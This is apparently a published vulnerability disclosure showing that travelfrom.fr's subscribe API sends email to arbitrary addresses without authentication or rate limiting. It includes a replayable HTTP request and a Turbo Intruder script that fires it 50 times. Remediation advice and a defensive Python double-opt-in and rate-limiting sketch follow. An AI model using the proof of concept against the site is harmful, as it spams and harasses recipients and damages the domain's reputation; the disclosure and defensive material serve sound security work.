Published On: 01 Aug 2025
An open subscription endpoint on travelfrom.fr allows unauthenticated users to submit any arbitrary email address to trigger email delivery from the site’s domain. This behavior can be exploited to send unsolicited emails (spam) to victims without requiring any verification or account association.
This vulnerability could be abused to:
1. Spam users with unwanted emails
2. Damage the brand's email reputation (the domain may be flagged as a spam source)
3. Lead to user harassment
4. Exhaust backend resources or email service quotas
5. Enable potential phishing-style social engineering campaigns
1. Unauthenticated attackers can send repeated emails to arbitrary addresses.
2. Enables mass abuse via scripting.
3. Allows misuse of third-party email addresses.
4. Damages the domain's email reputation.
Step 1: Send a request like the one below:
POST /en/api/common/subscribe HTTP/2
Host: travelfrom.fr
Content-Type: application/json
X-Csrf-Token: V66RsUtfHLCSbSBSYfvEdl3ZWolXfP0r
X-Api-Version: v1
Referer: https://travelfrom.fr/en

{
"email": "[email protected]",
"service": "avia"
}
Note: The above email ([email protected]) is not registered on the platform, yet the system accepts the request and appears to send an email.
Then check the inbox of that email account.
Step 2: Now replay the same request with Burp Suite's Turbo Intruder using a script like the one below:
def queueRequests(target, wordlists):
    # Turbo Intruder entry point: open an engine against the captured request's endpoint
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=10,
                           requestsPerConnection=10,
                           pipeline=True
                           )
    # queue the captured subscribe request 50 times unchanged
    for i in range(50):
        engine.queue(target.req)


def handleResponse(req, interesting):
    # show every response in the results table
    table.add(req)
Step 3: The number of emails successfully sent was 15, even though the endpoint should be restricted by a CAPTCHA or a rate limit (for example X-RateLimit: 3) or a related control.
1. Implement Double Opt-In: Require users to confirm their subscription by clicking a link sent to their email before any content is delivered.
2. Add CAPTCHA: Include a CAPTCHA in the form to prevent automation.
3. Rate Limiting: Limit the number of requests per IP and per email address.
4. Email Validation: Consider checking if the email belongs to a registered user, or throttle emails to unregistered addresses.
5. Log Abuse Attempts: Record abnormal behavior patterns for monitoring or blocking.
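As an added example, not code from this report or from travelfrom.fr, the following Python sketch puts the remediation items above together in one subscribe handler: it validates the address, applies a sliding-window limit per client IP and per email address, sends only an HMAC-signed confirmation link (double opt-in) rather than the newsletter itself, and records rejected attempts for monitoring. The class and function names, the limits (3 requests per IP per hour, 1 confirmation mail per address per hour), the in-memory stores and the `outbox` list standing in for SMTP delivery are all assumptions made for illustration.

```python
import hashlib
import hmac
import re
import time
from collections import defaultdict, deque

# Constructed, illustrative limits (assumption): tune to real traffic.
PER_IP_LIMIT = 3            # subscribe requests per window from one client address
PER_EMAIL_LIMIT = 1         # confirmation mails per window to one address
WINDOW_SECONDS = 3600
TOKEN_TTL_SECONDS = 24 * 3600
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


class SlidingWindowLimiter:
    """Counts events per key inside a sliding time window.

    In-memory for the example; a multi-server deployment would keep these
    counters in a shared store so every app node sees the same totals."""

    def __init__(self, limit, window):
        self.limit = limit
        self.window = window
        self.events = defaultdict(deque)

    def allow(self, key, now):
        q = self.events[key]
        while q and q[0] <= now - self.window:   # drop timestamps outside the window
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True


class SubscriptionService:
    """Double opt-in subscribe flow with per-IP and per-email throttling."""

    def __init__(self, secret):
        self.secret = secret                       # server-side HMAC key for confirmation tokens
        self.ip_limiter = SlidingWindowLimiter(PER_IP_LIMIT, WINDOW_SECONDS)
        self.email_limiter = SlidingWindowLimiter(PER_EMAIL_LIMIT, WINDOW_SECONDS)
        self.confirmed = set()                     # addresses that clicked the link
        self.outbox = []                           # stands in for the mail sender
        self.abuse_log = []                        # rejected attempts, for monitoring/blocking

    def _token(self, email, issued_at):
        msg = f"{email.lower()}|{issued_at}".encode()
        return hmac.new(self.secret, msg, hashlib.sha256).hexdigest()

    def subscribe(self, email, client_ip, now=None):
        now = time.time() if now is None else now
        if not EMAIL_RE.match(email):
            return {"status": 400, "reason": "invalid_email"}
        if not self.ip_limiter.allow(client_ip, now):
            self.abuse_log.append({"ip": client_ip, "email": email, "at": now, "why": "ip_rate_limit"})
            return {"status": 429, "reason": "ip_rate_limit"}
        key = email.lower()
        if key in self.confirmed:
            return {"status": 202, "reason": "accepted"}   # nothing to send; same reply as below
        if not self.email_limiter.allow(key, now):
            # A confirmation mail already went out recently: accept silently, send nothing.
            self.abuse_log.append({"ip": client_ip, "email": email, "at": now, "why": "email_rate_limit"})
            return {"status": 202, "reason": "accepted"}
        issued_at = int(now)
        token = self._token(email, issued_at)
        # Only a confirmation link is sent; the mailing itself waits for confirm().
        self.outbox.append({"to": email, "issued_at": issued_at, "token": token,
                            "link": f"/subscribe/confirm?email={email}&t={issued_at}&token={token}"})
        return {"status": 202, "reason": "accepted"}

    def confirm(self, email, issued_at, token, now=None):
        """Returns True only for an unexpired token that matches this address."""
        now = time.time() if now is None else now
        if now - issued_at > TOKEN_TTL_SECONDS:
            return False
        if not hmac.compare_digest(self._token(email, issued_at), token):
            return False
        self.confirmed.add(email.lower())
        return True
```

The IP check runs before the per-email check so a scripted loop like the Turbo Intruder run in Step 2 is cut off after the third request regardless of which addresses it submits, and the throttled-address branch returns the same 202 as a fresh request so the response does not reveal whether an address already has a pending confirmation. A CAPTCHA check would sit at the top of `subscribe()`, before any counter is consumed.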